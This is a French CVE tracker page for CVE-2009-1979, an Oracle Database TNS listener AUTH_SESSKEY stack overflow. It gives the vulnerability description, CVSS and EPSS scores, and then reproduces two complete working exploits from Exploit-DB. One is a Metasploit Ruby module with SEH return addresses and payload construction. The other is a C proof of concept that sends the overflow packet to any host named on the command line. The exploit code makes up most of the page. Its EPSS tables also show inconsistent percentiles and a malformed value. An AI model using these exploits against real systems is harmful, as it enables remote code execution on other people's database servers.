CVE-2009-1979

EPSS

78.89%V4

Vecteur

Network

Publié

2009-10-22
16h00 +00:00

Modifié

2018-10-10
16h57 +00:00

Liens officiels

CVE.org

NVD

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des notifications

Liste des Notifications

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez spécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2025-1234

Planifications

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions du CVE

Unspecified vulnerability in the Network Authentication component in Oracle Database 10.1.0.5 and 10.2.0.4 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2009 CPU. Oracle has not commented on claims from an independent researcher that this is related to improper validation of the AUTH_SESSKEY parameter length that leads to arbitrary code execution.

Informations du CVE

Faiblesses connexes

CWE-ID	Nom de la faiblesse	Source
CWE Other	No informations.

Métriques

Métriques	Score	Gravité	CVSS Vecteur	Source
V2	10		AV:N/AC:L/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	81.53%	–	–
2022-06-05	–	–	81.53%	–	–
2023-03-12	–	–	–	96.79%	–
2023-03-26	–	–	–	96.59%	–
2023-06-18	–	–	–	96.58%	–
2023-10-29	–	–	–	96.25%	–
2023-12-10	–	–	–	96.21%	–
2024-01-28	–	–	–	96.48%	–
2024-02-11	–	–	–	96.48%	–
2024-04-21	–	–	–	96.16%	–
2024-06-02	–	–	–	96.01%	–
2024-07-14	–	–	–	95.92%	–
2024-08-11	–	–	–	95.92%	–
2024-11-10	–	–	–	95.64%	–
2024-12-15	–	–	–	95.98%	–
2024-12-22	–	–	–	94.91%	–
2025-02-23	–	–	–	94.57%	–
2025-01-19	–	–	–	94.91%	–
2025-02-23	–	–	–	94.57%	–
2025-03-18	–	–	–	–	77.95%
2025-03-30	–	–	–	–	78.89%
2025-03-30	–	–	–	–	78.89,%

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Date	Percentile
2022-02-06	99%
2022-06-05	1%
2023-03-12	99%
2023-03-26	99%
2023-06-18	99%
2023-10-29	99%
2023-12-10	99%
2024-01-28	99%
2024-02-11	1%
2024-04-21	99%
2024-06-02	99%
2024-07-14	99%
2024-08-11	1%
2024-11-10	99%
2024-12-15	1%
2024-12-22	99%
2025-02-23	99%
2025-01-19	99%
2025-02-23	99%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

Informations sur l'Exploit

Exploit Database EDB-ID : 16342

Date de publication : 2010-11-23 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: tns_auth_sesskey.rb 11128 2010-11-24 19:43:49Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::TNS include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Oracle. When sending a specially crafted packet containing a long AUTH_SESSKEY value to the TNS service, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11128 $', 'References' => [ [ 'CVE', '2009-1979'], [ 'OSVDB', '59110'], [ 'BID', '36747'], [ 'URL', 'http://blogs.conus.info/node/28' ], [ 'URL', 'http://blogs.conus.info/node/35' ], [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Payload' => { 'Space' => 0x17e, 'BadChars' => "", # none, thx memcpy! 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], [ 'Oracle 10.2.0.1.0 Enterprise Edition', { # Untested 'Ret' => 0x011b0528 # p/p/r in oracle.exe v10.2.0.3 } ], [ 'Oracle 10.2.0.4.0 Enterprise Edition', { # Tested OK - 2010-Jan-20 - jduck 'Ret' => 0x01347468 # p/p/r in oracle.exe v10.2.0.3 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 20 2009')) register_options( [ Opt::RPORT(1521) ], self.class) end def check version = tns_version if (not version) raise RuntimeError, "Unable to detect version!" end print_status("Oracle version reply: " + version) return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/) return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/) return Exploit::CheckCode::Safe end def exploit mytarget = nil if target.name =~ /Automatic/ print_status("Attempting automatic target detection...") version = tns_version if (not version) raise RuntimeError, "Unable to detect version!" end if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/) mytarget = targets[1] elsif (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/) mytarget = targets[2] end if (not mytarget) raise RuntimeError, "Unable to automatically detect the target" end print_status("Automatically detected target \"#{mytarget.name}\"") else mytarget = target print_status("Attacking using target \"#{mytarget.name}\"") end username = rand_text_alphanumeric(0x1c) connect print_status("Sending NSPTCN packet ...") connect_data = "" + "(DESCRIPTION=" + "(CONNECT_DATA=" + "(SERVICE_NAME=orcl)" + "(CID=" + "(PROGRAM=client.exe)" + "(HOST=client_host)" + ")" + ")" + "(ADDRESS=" + "(PROTOCOL=TCP)" + "(PORT=1521)" + ")" + ")" nsptcn_pkt = tns_packet(connect_data) sock.put(nsptcn_pkt) # read NSPTRS (expecting 8 bytes) res = sock.get_once(-1, 1) #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res)) print_status("Re-sending NSPTCN packet ...") sock.put(nsptcn_pkt) # read NSPTAC (expecting 32 bytes) begin res = sock.get_once(-1, 1) rescue ::Errno::ECONNRESET, EOFError raise RuntimeError, "OOPS, maybe the service hasn't started completely yet, try again..." end #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res)) # send NA print_status("Sending NA packet ...") na_stuff = [0xdeadbeef].pack('N') + "\x00\x92" + "\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00" + "\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71" + "\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00" + "\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00" + "\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00" + "\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00" + "\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A" + "\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00" + "\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01" na_pkt = nsptda_packet(na_stuff) sock.put(na_pkt) # read response (expecting 127 bytes) res = sock.get_once(-1, 1) #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res)) # send TTIPRO print_status("Sending TTIPRO packet ...") ttipro_stuff = "\x01\x06\x05\x04\x03\x02\x01\x00" + "IBMPC/WIN_NT-8.1.0" + "\x00" ttipro_pkt = nsptda_packet(ttipro_stuff) sock.put(ttipro_pkt) # read response (expecting 179 bytes) res = sock.get_once(-1, 1) #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res)) # send TTIDTY print_status("Sending TTIDTY packet ...") ttidty_stuff = "\x02\xB2\x00\xB2\x00\xD2" + "\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01" + "\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01" + "\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00" + "\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07" ttidty_pkt = nsptda_packet(ttidty_stuff) sock.put(ttidty_pkt) # read response (expecting 22 bytes) res = sock.get_once(-1, 1) #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res)) # send first auth pkt (call OSESSKEY) print_status("Calling OSESSKEY ...") params = [] dtyauth_pkt = dtyauth_packet(0x76, username, 1, params) sock.put(dtyauth_pkt) # read RPA (expecting 225 bytes) res = sock.get_once(-1, 1) #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res)) # build exploit buffer print_status("Calling kpoauth with long AUTH_SESSKEY ...") sploit = payload.encoded sploit << rand_text_alphanumeric(0x19a - 0x17e) sploit << generate_seh_record(mytarget.ret) distance = payload_space + 8 + 5 sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string # ensure bad ptr is derefed value = rand(0x3fffffff) | 0xc0000000 sploit[0x17e,4] = [value].pack('V') # send overflow trigger packet (call kpoauth) params = [] params << { 'Name' => 'AUTH_SESSKEY', 'Value' => sploit, 'Flag' => 1 } dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params) sock.put(dtyauth_pkt) # expecting disconnect... if (res = sock.get_once(-1, 1)) print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res)) raise RuntimeError, "Try to run the exploit again.. If that doesn't work, the target host may be patched :-/" end handler disconnect end def tns_version connect version = "(CONNECT_DATA=(COMMAND=VERSION))" pkt = tns_packet(version) sock.put(pkt) sock.get_once res = sock.get_once(-1, 1) disconnect return res end def nsptda_packet(data) pkt = [data.length + 10].pack('n') # NSPHDLEN pkt << [0].pack('n') # NSPHDPSM pkt << [6].pack('C') # pkt type pkt << [0].pack('C') # reserved pkt << [0].pack('n') # NSPHDHSM pkt << [0].pack('n') # NSPDAFLG pkt << data return pkt end def dtyauth_packet(opi, user, flag, params) dunno = 2 dunno = 3 if opi == 0x73 pkt = [3, opi, dunno].pack('CCC') pkt << [-2].pack('V') pkt << [user.length].pack('V') pkt << [flag].pack('V') pkt << [-2].pack('V') pkt << [params.length].pack('V') pkt << [-2].pack('V') pkt << [-2].pack('V') pkt << [user.length].pack('C') pkt << user params.each { |param| name = param['Name'] pkt << [name.length].pack('V') pkt << [name.length].pack('C') pkt << name val = param['Value'] pkt << [val.length].pack('V') if (val.length > 0) if (val.length > 0xff) pkt << chunkify(val) else pkt << [val.length].pack('C') pkt << val end end flag = param['Flag'] pkt << [flag].pack('V') } return nsptda_packet(pkt) end def chunkify(buf) ret = "" if buf.length > 0xff ret << "\xfe" while (buf.length > 0xff) ret << "\xff" ret << buf.slice!(0, 0xff) end if buf.length > 0 ret << [buf.length].pack('C') ret << buf end ret << "\x00" else ret << [buf.length].pack('C') ret << buf end return ret end end

Exploit Database EDB-ID : 9905

Date de publication : 2009-10-29 23h00 +00:00
Auteur : Dennis Yurichev
EDB Vérifié : Yes

#include <winsock2.h> #include <stdio.h> #include <string.h> #include <windows.h> #include <assert.h> #include <string> void s_send (SOCKET s, char *msg, DWORD size) { int sent; printf ("s_send: begin: %d bytes\n", size); sent=send (s, (char*)msg, size, 0); if (sent==SOCKET_ERROR) { printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError()); } else if (sent!=size) printf ("sent only %d bytes\n", sent); printf ("s_send: end\n"); }; void s_recv (SOCKET s) { char buf[20000]; int r; struct timeval t; fd_set fd; t.tv_sec=0; t.tv_usec=100000; // 100 ms printf ("s_recv: begin\n"); FD_ZERO(&fd); FD_SET(s, &fd); if (select (0, &fd, 0, 0, &t)) // if (select (0, &fd, 0, 0, NULL)) { r=recv (s, buf, 20000, 0); if (r!=0 && r!=-1) { printf ("got %d bytes\n", r); } else { printf ("connection lost, r=%d\n", r); }; } else { printf ("select() returns zero\n"); }; }; unsigned char NSPTCN[]= { 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00, 0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00, //^^ ^^ cmd len 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; #define NSPTCN_HEADER_LEN 58 unsigned char NSPTDA[]= { 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, // ^^ ^^ packet len 0x00, 0x00 }; #define NSPTDA_HEADER_LEN 10 void s_send_NSPTDA (SOCKET s, char *msg, int size) { char * buf; int sz=size + NSPTDA_HEADER_LEN; buf=(char*)malloc (sz); NSPTDA[0]=( sz ) >> 8; NSPTDA[1]=( sz ) & 0xFF; memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN); memcpy (buf + NSPTDA_HEADER_LEN, msg, size); printf ("s_send_NSPTDA: sending %d bytes...\n", sz); s_send (s, (char*)buf, sz); free (buf); }; void s_send_TNS_command (SOCKET s, const char *cmd) { unsigned char * pkt; int cmd_len=strlen (cmd); printf ("sending [%s]\n", cmd); printf ("len: %d\n", cmd_len); if (cmd_len<231) { int str_len=strlen(cmd); int pkt_len=str_len+58; pkt=(unsigned char*)malloc (str_len+58); memcpy (pkt, "\x00\x00\x00\x00\x01\x00\x00\x00" // plenH, plenL "\x01\x3A\x01\x2C\x00\x41\x20\x00" "\x7F\xFF\xC6\x0E\x00\x00\x01\x00" "\x00\x00\x00\x3A\x00\x00\x02\x00" // cmdlenH cmdlenL "\x61\x61\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00", 58); memcpy (pkt+58, cmd, str_len); pkt[1]=pkt_len&0xFF; pkt[0]=(pkt_len>>8)&0xFF; pkt[25]=str_len&0xFF; pkt[24]=(str_len>>8)&0xFF; s_send (s, (char*)pkt, pkt_len); free (pkt); } else { // something should be modified here in NSPTCN assert (0); }; }; bool try_host (char * h) { struct hostent *hp; WSADATA wsaData; struct sockaddr_in sin; int r; struct timeval t; fd_set fd; SOCKET s; char pkt1318[1318]; WSAStartup(MAKEWORD(1, 1), &wsaData); hp=gethostbyname (h); assert (hp!=NULL); s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); assert (s!=INVALID_SOCKET); { u_long on=1; assert (ioctlsocket(s, FIONBIO, &on) != -1); }; sin.sin_family=AF_INET; sin.sin_port=htons(1521); memcpy(&sin.sin_addr, hp->h_addr, hp->h_length); r=connect(s, (struct sockaddr *)&sin, sizeof(sin)); t.tv_sec=3; t.tv_usec=0; FD_ZERO(&fd); FD_SET(s, &fd); if (select (0, 0, &fd, 0, &t)) { printf ("connected to %s\n", h); s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))"); // waiting for NSPTRS s_recv(s); s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))"); // waiting for NSPTAC s_recv(s); // send NA packet s_send (s, "\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92" "\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00" "\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71" "\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00" "\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00" "\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00" "\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00" "\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A" "\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00" "\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01" ,156); s_recv (s); // send TTIPRO s_send (s, "\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02" "\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38" "\x2E\x31\x2E\x30\x00" , 37); s_recv (s); // send TTIDTY s_send (s, "\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2" "\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01" "\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01" "\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00" "\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07" , 75); s_recv (s); // call OSESSKEY s_send (s, "\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF" "\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00" "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D" "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41" "\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F" "\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D" "\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65" "\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F" "\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B" "\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08" "\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00" "\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00" "\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06" "\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00" , 218); // call OAUTH memcpy (pkt1318, "\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF" "\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00" "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C" "\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59" "\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41" "\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36" "\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35" "\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43" "\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55" "\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40" "\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46" "\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38" "\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37" "\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34" "\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54" "\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D" "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45" "\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00" "\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C" "\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00" "\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F" "\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78" "\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D" "\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47" "\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00" "\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09" "\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00" "\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64" "\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45" "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41" "\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00" "\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49" "\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00" "\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49" "\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52" "\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61" "\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00" "\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F" "\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35" "\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45" "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42" "\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00" "\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04" "\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54" "\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9" "\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49" "\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55" "\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20" "\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27" "\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52" "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49" "\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D" "\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52" "\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27" "\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52" "\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C" "\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27" "\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44" "\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41" "\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52" "\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45" "\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27" "\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41" "\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52" "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54" "\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E" "\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53" "\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41" "\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48" "\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C" "\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54" "\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41" "\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53" "\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20" "\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49" "\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00" "\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F" "\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44" "\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42" "\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42" "\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55" "\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00" "\x00\x00\x00\x00\x00\x00" ,1318); pkt1318[0x41]=0x80; s_send (s, pkt1318, 1318); assert (closesocket (s)==0); return true; } else { printf ("while connect(): select() returns zero\n"); assert (closesocket (s)==0); return false; }; }; void main(int argc, char * argv[]) { printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n"); printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n"); if (argv[1]==NULL) { printf ("use: %s <hostname>\n", argv[0]); return; }; try_host (argv[1]); };